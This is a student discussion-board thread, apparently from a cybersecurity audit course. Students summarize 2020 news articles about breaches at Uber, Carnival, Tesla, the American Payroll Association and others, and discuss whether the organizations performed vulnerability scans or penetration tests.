During the week, research an article that describes a recent breach (hack) of an organization. Of special interest this week, does the article discuss whether the organization had conducted some sort of vulnerability scans, penetration tests, and/or red or blue team exercises?
When citing the article, include the URL, so that others can read the rest of the article.
Eugene Angelo Tartaglione says
https://slate.com/technology/2020/08/uber-joseph-sullivan-charged-data-breach.html
In this article it is discussed that he Department of Justice charged Uber’s former chief security officer Joseph Sullivan with obstruction of justice for trying to cover up a data breach the ride-share service experienced in late 2016.
Instead of telling the public about the datat breach, leadership from Uber paid the perpetrators $100,000 for their silence of the incidence. They later announced the breach in 10/2017
Kelly Sharadin says
No honor among thieves, hackers love the notoriety they receive for their attackers. On the flipside I know ethical hackers also love the same type of notoriety for “exposing” a breach which can led to inflated instances of ‘hacks’ but really no unique information was actually leaked.
Humbert Amiani says
Eugene it is quite surprising just how many organisations go to such lengths to hide breaches. In some isolated cases this silencing might be a good thing since it buys the company time to seal the loophole, rather than announce while still working on it only for another group of hackers to take advantage of. Cisco could have used this strategy a while ago when a vulnerability was found on their systems, then right when they made it public it was exploited.
Candace T Nelson says
There is almost nothing that bothers me more than companies that fail to appropriately address data breaches and ultimately fall victim to them one or two or more times after the initial event (and I use the term victim lightly, especially after the second or third breach…). I have either experienced (Equifax) or studied (Trump Hotels) so many of these companies while participating in the ITACS program at Temple it practically makes me ill. My credit remains frozen at all three credit reporting bureaus because – quite frankly – I don’t trust any one of them to keep my PII safe. It seems that the fines and penalties should be exponentially higher for each subsequent breach since the reputational impact on these repeat offenders does not seem sufficient to drive change.
Nicholas Fabrizio says
Hi Candace,
I agree with you that it is infuriating how some companies handle data breaches and the customer deal with the aftermath. I as well have frozen my credit reporting due to some fraudulent activity I’ve experienced as a result of a organization’s data breach. It seems much safer to just keep my credit frozen and unfreeze it as needed.
Zhuofu Wang says
Paying a ransom to hackers will only make them more aggressive to steal more information, but sometimes you have no choice. The company still needs to maintain a high degree of attention, even gave what hackers are required, and obtained the “guarantee” from them. The company needs to resolve the vulnerabilities in the shortest time to prevent it from being exploited by other hackers.
Jerry Butler says
Man Uber uper management had alot of issues during this time spand. Accountablity is going to come down very hard on companies in legislation. GDRP is one that comes to mind. Companied like uber are international and the things they can get away with will come to a screeching halt.
Anthony Wong says
I completely agree… the punishment should be more severe simply because Uber tried to hide the breach. Regardless of the end result, I think it drastically affects the company’s reputation. If Uber was unethical enough to hide a data breach, who knows was else they could be hiding.
Eugene Angelo Tartaglione says
https://slate.com/technology/2020/08/uber-joseph-sullivan-charged-data-breach.html
In this article it is discussed that he Department of Justice charged Uber’s former chief security officer Joseph Sullivan with obstruction of justice for trying to cover up a data breach the ride-share service experienced in late 2016.
Instead of telling the public about the datat breach, leadership from Uber paid the perpetrators $100,000 for their silence of the incidence. They later announced the breach in 10/2017
“On Nov. 14, 2016, Sullivan received an email from johndoughs@protonmail.com (get it?) claiming that the sender had found a “major vulnerability” in Uber’s database of customer information and had been able to “dump uber database and many other things,” indicating that they had been able to access all the information stored in the database and “dump” it onto their own servers.”
So this seems that it was an outside actor who found these vulnerabilities on Ubers databases. it does not seem like they did internal pen testing, and instead it was someone else.
Zhuofu Wang says
“APT Hackers Exploit Autodesk 3ds Max Software for Industrial Espionage”
URL: https://thehackernews.com/2020/08/autodesk-malware-attack.html?&web_view=true
Bitdefender’s Cyber Threat Intelligence Lab found an espionage attack, which was targeting an unnamed international architectural and video production company. The researcher mentioned that “the cybercriminal group infiltrated the company using a tainted and specially crafted plugin for Autodesk 3ds Max”, and “the sophistication of the attack reveals an APT-style group that had prior knowledge of the company’s security systems and used software applications, carefully planning their attack to infiltrate the company and exfiltrate data undetected”(Ravie).
This shows that this attack is not a spontaneous attack by the APT hacker group. Some competing private companies may “hire” the APT group for seeking confidential information to win contracts for luxury projects. As competition in the real estate industry has become increasingly fierce, the industrial espionage has gradually escalated and become more frequent.
Kelly Sharadin says
Hi Zhuofu,
I posted about Deathstalker last an APT that also operates in the industrial espionage space. I think this is a really fasnicating area to research – thanks for sharing this article.
Nicholas Fabrizio says
Title: Skimming Attack Hits American Payroll Association
URL: https://www.infosecurity-magazine.com/news/skimming-attack-hits-american/
In July 2020 the American Payroll Association (APA) discovered malware on their login page and checkout section of their online store. The APA’s IT department uncovered the malware after investigating unusual activity dating back to May and determined the potential information stolen included login credentials, names, date of births, and credit card information. Their investigation also found that the malware was installed via an vulnerability in their content management system (CMS). The APA has since installed additional antivirus software on their servers and updated their content management system with the latest security patches. In my opinion it sounds as if this company could have prevented this attack by performing routine security assessments on their servers, which may have caught the out-of-date CMS security patches.
Candace T Nelson says
Thank you for this post, Nick. I find it interesting that these hackers attacked a non-profit organization with a large number of members (approximately 21,000). It is not unusual that a non-profit might not have sufficient funds to invest in securing its technology infrastructure. In a sense, I guess that makes organizations of this nature particularly vulnerable to cyber attacks. It also seems that there may have been some satisfaction gained by the “intruders” in that they successfully breached a notorious and highly regarded association whose focus is on payroll, which hits home for any one of us who has ever received a paycheck.
Anthony Wong says
Wow, it’s hard to believe something as simple as CMS patches were not identified and implemented regularly by the IT department. I think the APA should implement monitoring services that would help them identify issues more quickly. APA will definitely re-evaluate their security policies and review their applications more frequently. In the article, it notes APA paid for credit monitoring services for those affected, but I would be curious to see how much money this breach costed them.
Bryan Garrahan says
I think companies tend to take the approach of focusing on and protecting systems that are responsible for performing financial transactions. This could be due to financial or resource limitations but it could also be that companies don’t fully understand how valuable their data is. I believe in this case the company may not have taken into consideration the appropriate associated risk with the CMS system – which therefore led to less control and ultimately a compromise of PII data.
Kelly Sharadin says
A known macOS Malware was able to by-pass Apple’s automated scans to gain access to its AppStore as an “approved” app. “Shlayer” adware is one of the most notorious malware campaigns to affect macOS machines. The hack was reported to Apple’s security researchers by a college student who discovered the malicious code through HomeBrew’s website, a Mac development tool. Apple revoked the app’s notarization and removed the adware from its store the same day. Thomas Reed, MalwareBytes’ director of Mac and mobile platforms, is not surprised by the malicious by-pass. He is quoted saying “Mac malware like adware evolve to get around notarization.” Attackers try to exploit notarization as way to gain users trust to download malicious apps that slip through trusted platforms like the AppStore. Apple’s AppStore notarization process is designed to stop malware from being deployed to unsuspecting AppStore customers. Although it would appear its automated scanning needs some tweaking.
https://www.wired.com/story/apple-approved-malware-macos-notarization-shlayer/
Jerry Butler says
Man the recon of Shlayer must have been good. They are well known but were able to figure out what criteria is needed to get approved.
Kelly Sharadin says
Exactly, Jerry thats what makes this pretty astounding!
Humbert Amiani says
European ISPs’ hit by DDoS attacks
Several ISPs’ in Belgium, France and Netherlands suffered a wave of DDoS attacks that lasted several hours. Services from the respective ISPs were brought to a halt before the attacks were eventually mitigated. It was discovered that the attacks targeted the DNS infrastructure and routers of the target ISP.
NBIP, a non-profit organisation founded by Dutch ISPs’ to combat DDoS attacks, was able to track and mitigate most of the attacks making services from the ISPs’ available again. It is suspected that the attacks were conducted by a criminal gang that engages in DDoS extortion of financial institutions.
https://www.zdnet.com/article/european-isps-report-mysterious-wave-of-ddos-attacks/?&web_view=true
Candace T Nelson says
I am really glad that you posted this article, Humbert. I also read the accompanying article about the criminal gang engaging in DDOS extortion against global financial institutions, including Venmo. I have contemplated enrolling in Venmo since the pandemic began as a method to fund organization that I used to frequent and now participate in virtually. Having read this convinced me that – in light of the increase in cyberattacks since the global pandemic began and working from home became the “new normal” – my reluctance to engage in new and unfamiliar methods of transferring cash is based on sound logic as opposed to being old fashioned.
Humbert Amiani says
Candace, in this day financial institutions are at the mercy of cyber-criminals. The pandemic amplified the occurrences due to the shift to teleworking and the added security burden as organisations try to ensure employees get access to all resources remotely.
Anthony Wong says
I think it’s pretty smart from these criminals, if they are unable to break into the financial institution itself, they start to attack key vendors that will affect its business operations. For example beside ISPs, hackers could target vendors that provide payment processing services and credit reporting agencies.
Candace T Nelson says
Carnival left to right the ship after breaches threaten travelers’ trust
https://www.scmagazine.com/home/security-news/data-breach/carnival-must-right-the-ship-after-breaches-threaten-travelers-trust/?ocid=uxbndlbing
In this article, the author revealed that Carnival Cruise Lines detected a ransomware attack on August 15th that accessed and encrypted a portion of the technology systems of one of its brands and downloaded data files that contained customer personal information. Since 2019, Carnival has been the victim of two confirmed cyberattacks and a potential third attack, including a 2019 data breach that impacted the company’s Princess and Holland America cruise lines that was committed via deceptive phishing emails. It is noteworthy that this breach was initially identified in May 2019 and appears to have spanned the period from April 11 through July 23, 2019.
It is believed that the current breach may have resulted from Carnival’s use of vulnerable devices and their failure to apply available patches in a timely manner. Specifically, exploitation of a Citrix vulnerability (CVE-2019-19781) and a Palo Alto Firewall flaw (CVE-2020-2021) could have allowed hackers to gain unauthorized access to the corporate networks.
The author went on to state that, after learning about the prior breach in March 2020, cyber intelligence company Prevailion began sorting through its data relate to Carnival and discovered a malicious program. Prevailion attempted to warn Carnival, who failed to respond to their warnings. Prevailion refrained from going public with this information until the current breach was publicized.
It seems obvious that a thorough security assessment was not performed by or on behalf of Carnival after the breach that was identified in May 2019 since the networks were still so vulnerable to attack a year later. While data breaches are not always preventable, recurring breaches at the same company are difficult to ignore. Carnival claims the incident will not have a material impact on its business. However, it is difficult to measure the reputational harm that has been caused by this series of events. It is also too early to tell how significant the financial impact of allowing unauthorized access to the personal information of guest and employees may be on the world’s largest cruise operator.
Zhuofu Wang says
Thank you for your post. Although this sounds ridiculous, some companies will first evaluate the cost of repairing after discovering vulnerabilities. Sometimes they will not take any measures. So customers are often the ones who lost the most, they don’t know anything about it.
Jerry Butler says
Thank you for the post. Its definitely up to the company risk apitie wether they will mitigate risk or not. If I’m reading correctly they data was encrypted that was stole? If this is the case than most companies wont act
Jerry Butler says
https://threatpost.com/elon-musk-confirms-tesla-factory-a-target-of-foiled-cyberattack/158762/
In this article clearly Tesla has two safeguards in place from a form or pentesting. Social engineering is a extremely tough attack to counter. In this case the user was offered 100K, and then a million once executed. I wonder if they will implement a program that will reward users for this type of action. The power Tesla holds on public safety is high. I think at some point Tesla will have to be treated as high as top secret government.
Anthony Wong says
I would agree an incentive program would be a great idea. In this case, I think Tesla was extremely lucky because the employee was ethical and reported the issue immediately. Perhaps with a different employee this would have ended differently. With a program in place, I think Tesla would lower its chances of another social engineering scheme to take place.
Kelly Sharadin says
This case was crazy. I love your idea of a rewarded honor system. I’m sure employement with Telsa involves insane binding contracts but to further increase loyalty, you propose a really interesting idea. SpaceX is pretty much a government organization – I’m sure they share similar policies.
Anthony Wong says
The Jewish Federation of Greater Washington in Maryland was the victim of a $7.5 million hack. An employee was working from home because of the current environment, however, he on his personal machine. The hack was discovered by a security contractor that noticed atypical email activity, which makes me think the attacker accomplished this through a phishing scam. As a result, employees are no longer allowed to use their personal laptops. Next steps is an audit to determine if losses were greater than the estimated $7.5 millon. It would be interesting to see how the organization determined it was safe for the employees to use their personal machine instead of providing work sponsored laptop.
URL: https://hotforsecurity.bitdefender.com/blog/hacker-steals-7-5-million-from-maryland-non-profit-by-compromising-employees-personal-computer-24078.html?web_view=true
Bryan Garrahan says
When COVID 19 hit I was very impressed with our IT department’s ability to quickly adapt to a remote environment. Each employee at our organization was prepared to perform their daily job duties on a company issued machine from their home. Unfortunately, I don’t believe this was the case for every business and some had to deploy an all hands on deck approach in order to get their employees up and running. Meanwhile, the security posture of organizations took a backseat because the approach was likely “We need to keep the lights”. In this case specifically, it could have been the employee had a desktop workstation at the office and simply didn’t have a company issued laptop so instead they were required to use a personal device.
Bryan Garrahan says
The Allegheny County Airport Authority sued Involta LLC after the firm allegedly did not adequately fulfill their promised Cyber security services, which ultimately left the Airport Authority unprotected and exposed to several vulnerabilities within its network. The articles states, “Among the duties required in the contract were providing maintenance and software support for servers used by the authority and providing cybersecurity services like vulnerability scans and penetration testing to “determine if vulnerabilities exist that could be exploited by nefarious parties to unlawfully access ACAA systems, devices or data.” The article furthers, “Despite Involta’s contractual obligation to install patches and updates in a timely fashion, Involta allowed outdated and unpatched software to remain in use at ACAA for excessive periods of time, and Involta left known vulnerabilities unpatched.” While this article doesn’t actually reflect a hack, it does bring to light that your systems could easily be exploited even by performing best practices such as vulnerability scans. Organizations must be cautious in selecting vendors who provide them services because it could lead to financial and reputational losses – which was the case for The Allegheny County Airport Authority.
https://triblive.com/local/allegheny-county-airport-authority-sues-it-company-for-alleged-cybersecurity-failures/
Amelia Safirstein says
Greenville Technical College was attacked by hackers using ransomware. The hackers successfully gained access to the College’s systems using a vulnerability in the College’s VPN and encrypted data before demanding a ransom. Unfortunately for the hackers, the college had sufficient backups and they were able to restore their systems without giving into demands.
https://www.greenvilleonline.com/story/news/local/2020/08/28/greenville-tech-says-thwarts-data-breach-after-ransom-sought/5662602002/
Bryan Garrahan says
Thanks Amelia – I’d be curious if Greenville Tech’s IT department considered and planned for an attack such as this before it actually occurred. Perhaps they were aware that there was no sensitive data living in the system and there their approach to mitigating the chance of data loss was to deploy sound backup and restore controls. Or perhaps they just lucked out by having non-sensitive data compromised which motivated them to investigate other potential vulnerable areas in their network along with the third-party Cyber Security vendor as referenced in the article.
Jerry Butler says
https://krebsonsecurity.com/2020/12/account-hijacking-site-ogusers-hacked-again/ –
Roughly a week ago, the OGUsers homepage was defaced with a message stating the forum’s user database had been compromised. The hack was acknowledged by the forum’s current administrator, who assured members that their passwords were protected with a password obfuscation technology that was extremely difficult to crack.